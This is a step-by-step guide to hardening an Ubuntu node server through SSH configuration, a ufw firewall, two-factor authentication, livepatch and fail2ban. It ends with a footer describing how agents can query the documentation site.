# Pre-configure the Node Server

### Connect to the server <a href="#connect-to-the-server" id="connect-to-the-server"></a>

Using the key generated from the AWS console and using a SSH client like Putty, connect to your Ubuntu server. If you are logged in as root then create a user-level account with admin privileges instead, since logging in as the root user is risky.

Create a new user. Replace `yourusername` with a username of your choice. You will asked to create a strong password and provide some other optional information.

```
sudo adduser <yourusername>
```

Grant admin rights to the new user by adding it to the sudo group. This will allow the user to perform actions with superuser privileges by typing sudo before commands.

```
sudo usermod -aG sudo <yourusername>
```

Optional: If you used SSH keys to connect to your Ubuntu instance via the root user you will need to associate the new user with the root user’s SSH key data.

```
sudo rsync --archive --chown=<yourusername>:<yourusername> ~/.ssh /home/<yourusername>
```

Finally, log out of `root` and log in as `<yourusername>`

### Update the Server

Make sure the system is up to date with the latest software and security updates.&#x20;

```
sudo apt update && sudo apt upgrade
sudo apt dist-upgrade && sudo apt autoremove
sudo reboot
```

Enable automatic updates

```
sudo apt-get install unattended-upgrades
sudo dpkg-reconfigure -plow unattended-upgrades
```

**Optional**: Change the server's hostname with the following command:

```
sudo hostnamectl set-hostname <newNameHere>
```

## Secure the Server&#x20;

This guide will follow a list of settings in the [CoinCashew](https://www.coincashew.com/coins/overview-ada/guide-how-to-build-a-haskell-stakepool-node/how-to-harden-ubuntu-server) guide. This is not a comprehensive list and you should investigate other security steps specific to your own setup and situation.

### SSH Configuration

The following section will edit the contents of your `sshd_config` file, it is recommended to make a backup of this file before proceeding and to understand more about each of the settings you will edit you can view the sshd help file by typing:&#x20;

```
man sshd_config
```

Change the SSH **Port** in the `sshd_config` file

```
sudo nano /etc/ssh/sshd_config
```

Find the line `#Port 22` remove the `#` and replace the number with the port number of your choice

```
Port <YourSSHPortNumber>
```

{% hint style="info" %}
***At this point you may want to configure your firewall to allow the new port number.*** See the **Firewall Configuration** section below. Also remember to update any AWS Security Groups if you have those configured.
{% endhint %}

Locate the line for **ChallengeResponseAuthentication** and set it to ‘no’

```
ChallengeResponseAuthentication no
```

Locate the line for **PasswordAuthentication** and set it to ‘no’

```
PasswordAuthentication no
```

Locate the line for **PermitRootLogin** and set it to ‘no’

```
PermitRootLogin no
```

Locate the line for **PermitEmptyPasswords** and set it to ‘no’

```
PermitEmptyPasswords no
```

Locate the line for **PubkeyAuthentication** and set it to ‘yes’. This will change the configuration to only accept public keys.

```
PubkeyAuthentication yes
```

Change **ClientAliveInterval** to 300 and **ClientAliveCountMax** to 0

```
ClientAliveInterval 300
ClientAliveCountMax 0
```

Save and close the file, then test the SSH config.&#x20;

```
sudo sshd -t
```

If there are no errors then restart the SSH process

```
sudo systemctl restart sshd
```

Open another Putty terminal and test connecting on the new SSH port before closing the existing terminal.

#### Restricting access to specific users or IPs

{% hint style="warning" %}
**Optional Steps:** lockdown SSH to a specific user and/or from a specific IP. Only perform these step if you are confident your IP won’t change.
{% endhint %}

Open the SSHD config file again

```
sudo nano /etc/ssh/sshd_config
```

to restrict just to a specific user add the following to the bottom of the file

```
AllowUsers <SSH_User1> <SSH_User2> 
```

alternatively to restrict to a specific IP add the following line to the bottom of the file

```
AllowUsers <SSH_User>@<Public_IP>
```

Save and close the file and restart SSHD

```
sudo systemctl restart sshd
```

#### Restrict Access Using IP Tables

Alternatively, you can use IP tables to restrict access to the SSH port from a single IP or network. As root enter the follow at the command line

```
sudo iptables -A INPUT -p tcp --dport <YOUR_SSH_PORT> -s <Your_Public_IP> -j ACCEPT
sudo iptables -A INPUT -p tcp --dport <YOUR_SSH_PORT> -j DROP
```

### Create a new ED25519 encryption key and replace the default AWS RSA 2048-bit key

The default AWS SSH key is using **RSA SSH-2 2048-bit** encryption. It is recommended to create another key pair using **ED25519** encryption, follow the Putty user guide [here](https://docs.digitalocean.com/products/droplets/how-to/add-ssh-keys/create-with-putty/). Ensure you have set a strong password on your private key. Read up about ED25519 [here](https://medium.com/risan/upgrade-your-ssh-key-to-ed25519-c6e8d60d3c54).

Then once you’ve created the key copy the public key to the `~/.ssh/authorized_keys` file.&#x20;

```
sudo nano ~/.ssh/authorized_keys
```

save and close the file.

Test the new key works by opening a new SSH session via Putty and using the custom port you set earlier.

![](/files/-MeGXlqYzr4kRNx9DO_N)

Once confirmed either backup and delete or comment (**`#`**) out the previous RSA key’s line in the `authorized_keys` file.

Ensure the `authorized_keys` file has the correct permissions by running the following command

```
chmod -R go= ~/.ssh
```

Check the permissions are set correctly

```
cd ~/.ssh
ls -l
```

![](/files/-MeGUol2cptvap7Rl-mc)

### Disable the root account

Disable the ability to login with the `root`account using a password

```
sudo passwd -l root
```

### Firewall Configuration&#x20;

ufw is a a common linux based firewall package which we will install

Install the ufw package

```
sudo apt install ufw
```

Explicitly apply the defaults. Inbound traffic denied, outbound traffic allowed.

```
sudo ufw default deny incoming
sudo ufw default allow outgoing
```

Allow inbound traffic on `<YourSSHPortNumber>` as set in the **SSH Configuration** section above. SSH requires the TCP protocol.

```
sudo ufw allow <yourSSHportnumber>/tcp
```

{% hint style="warning" %}
**Optional:** You may also choose to lockdown access to your specific public IP. However be warned that if your public IP changes you may lose access.
{% endhint %}

```
sudo ufw allow proto tcp from <YourPublicIP> to any port <YourSSHPortNumber>
```

Deny inbound traffic on port 22/TCP.

{% hint style="danger" %}
***Only perform this step after confirming you have connected over SSH using \<YourSSHPortNumber>***
{% endhint %}

```
sudo ufw deny 22/tcp
```

Enable the firewall and check to verify the rules have been correctly configured.

```
sudo ufw enable
sudo ufw status numbered
```

### Two-factor authentication (optional but encouraged)&#x20;

Two-factor authentication gives you an extra layer of security in the event your SSH key was compromised. Although we are installing the **Google Authenticator** package you can also use an alternative 2fA app like **Authy**.

{% hint style="danger" %}

#### **Warning!!** *Ensure you complete all these steps without closing the Putty terminal. If you close the Putty terminal before you complete all the steps you may not be able to log back in again.*

{% endhint %}

Install the Google Authenticator package

```
sudo apt install libpam-google-authenticator -y
```

Run `google-authenticator` &#x20;

```
google-authenticator
```

enter ‘y’ to the first prompt

```
Do you want authentication tokens to be time-based (y/n): y
```

A QR Code will appear with a Secret Key, a number of scratch codes and a prompt for further options. Open your **Google Authenticator** or **Authy** app and enter in your secret key. Copy down your emergency scratch codes for safe-keeping.

The recommended settings for the subsequent prompts are:

```
Update the .google_authenticator file: yes
Disallow multiple uses: yes
Increase the original generation time limit: no
Enable rate-limiting: yes
```

Make a backup of the sshd configuration file

```
sudo cp /etc/pam.d/sshd /etc/pam.d/sshd.bak
```

Edit the /etc/pam.d/sshd file to make SSH use Google Auhthenticator

```
sudo nano /etc/pam.d/sshd
```

and add the following lines

```
@include common-password
auth required pam_google_authenticator.so nullok
auth required pam_permit.so
```

save and close the file.

Edit the SSH configuration file

```
sudo nano /etc/ssh/sshd_config
```

locate the `ChallengeResponseAuthentication` line and update to ‘yes’

```
KbdInteractiveAuthentication yes
```

locate the UsePAM line and update to ‘yes’

```
UsePAM yes
```

Save and close the file then restart the SSHD service

```
sudo systemctl restart sshd.service
```

{% hint style="warning" %}
2FA is not fully configured yet but open another Putty window to confirm all is working okay. You should not be prompted for any two-factor authentication yet. **DO NOT** close your existing terminal.
{% endhint %}

Make SSH aware of 2FA by opening the SSH configuration file

```
sudo nano /etc/ssh/sshd_config
```

and add the following line to the bottom of the file

```
AuthenticationMethods publickey,password publickey,keyboard-interactive
```

save and close the file.

Open the PAM sshd configuration file

```
sudo nano /etc/pam.d/sshd
```

and comment out the following line by adding a `#` character at the start

```
#@include common-auth
```

Save and close the file the restart SSH.

```
sudo systemctl restart sshd.service
```

Now open another Putty terminal session and you should be asked to enter the two-factor code.&#x20;

![](/files/-MeGawmmHZBnVCuAvVB3)

### Kernel Live Patching&#x20;

The Livepatch Service intends to address high and critical severity Linux kernel security vulnerabilities, as identified by Ubuntu Security Notices and the CVE tracker. Since there are limitations to the kernel livepatch technology, some Linux kernel code paths cannot be safely patched while running. There may be occasions when the traditional kernel upgrade and reboot might still be necessary.

You will need to create an account at <https://login.ubuntu.com/>. The free tier allows installation on up to three machines. You will be given a subscription token which can be found here <https://ubuntu.com/advantage>

Attach the token to your server

```
sudo ua attach <YOUR_TOKEN>
sudo ua status
```

### Secure Shared Memory

Shared memory can be used in an attack against a running service. Because of this, secure that portion of system memory. You can do this by modifying the **/etc/fstab** file.

Edit the fstab file

```
sudo nano /etc/fstab
```

Add the following line

```
tmpfs	/run/shm	tmpfs	ro,noexec,nosuid	0 0
```

Save and close the file, then reboot.

```
sudo reboot
```

### Install Fail2Ban&#x20;

Fail2ban is an intrusion-prevention system that monitors log files and searches for particular patterns that correspond to a failed login attempt. If a certain number of failed logins are detected from a specific IP address (within a specified amount of time), fail2ban blocks access from that IP address.

Install fail2ban

```
sudo apt-get install fail2ban -y
```

Edit the config file

```
sudo nano /etc/fail2ban/jail.local
```

and add the following to the file `ignoreip = <list of whitelisted IP address, your local daily laptop/pc>` . Also amend the port number to your own SSH port.

```
[sshd]
enabled = true
port = <22 or your random port number>
filter = sshd
logpath = /var/log/auth.log
maxretry = 3
# whitelisted IP addresses
ignoreip =  <list of whitelisted IP address, your local daily laptop/pc>
```

save and close the file.

Restart fail2ban

```
sudo systemctl restart fail2ban
```

That concludes the first step in preparing your Node Server. Head to the next page to install Node Exporter.

## Sources:

[Digital Ocean MFA Setup Link](https://www.digitalocean.com/community/tutorials/how-to-set-up-multi-factor-authentication-for-ssh-on-ubuntu-18-04)

[ED25519 Reference](https://medium.com/risan/upgrade-your-ssh-key-to-ed25519-c6e8d60d3c54)

[Coin Cashew’s Hardening Ubuntu Guide](https://www.coincashew.com/coins/overview-ada/guide-how-to-build-a-haskell-stakepool-node/how-to-harden-ubuntu-server)

[Digital Ocean Ubuntu Open SSH Hardening Tips](https://www.digitalocean.com/community/tutorials/how-to-harden-openssh-on-ubuntu-18-04)

[How to Harden your Ubuntu 18.04 Server](https://medium.com/@BaneBiddix/how-to-harden-your-ubuntu-18-04-server-ffc4b6658fe7)

[Linux hardening security tips](https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/)

[Kernal Live Patching - Florian Pieper](https://github.com/fpieper/fpstaking/blob/main/docs/validator_guide.md)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.radix-staking.com/build-the-node-server.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.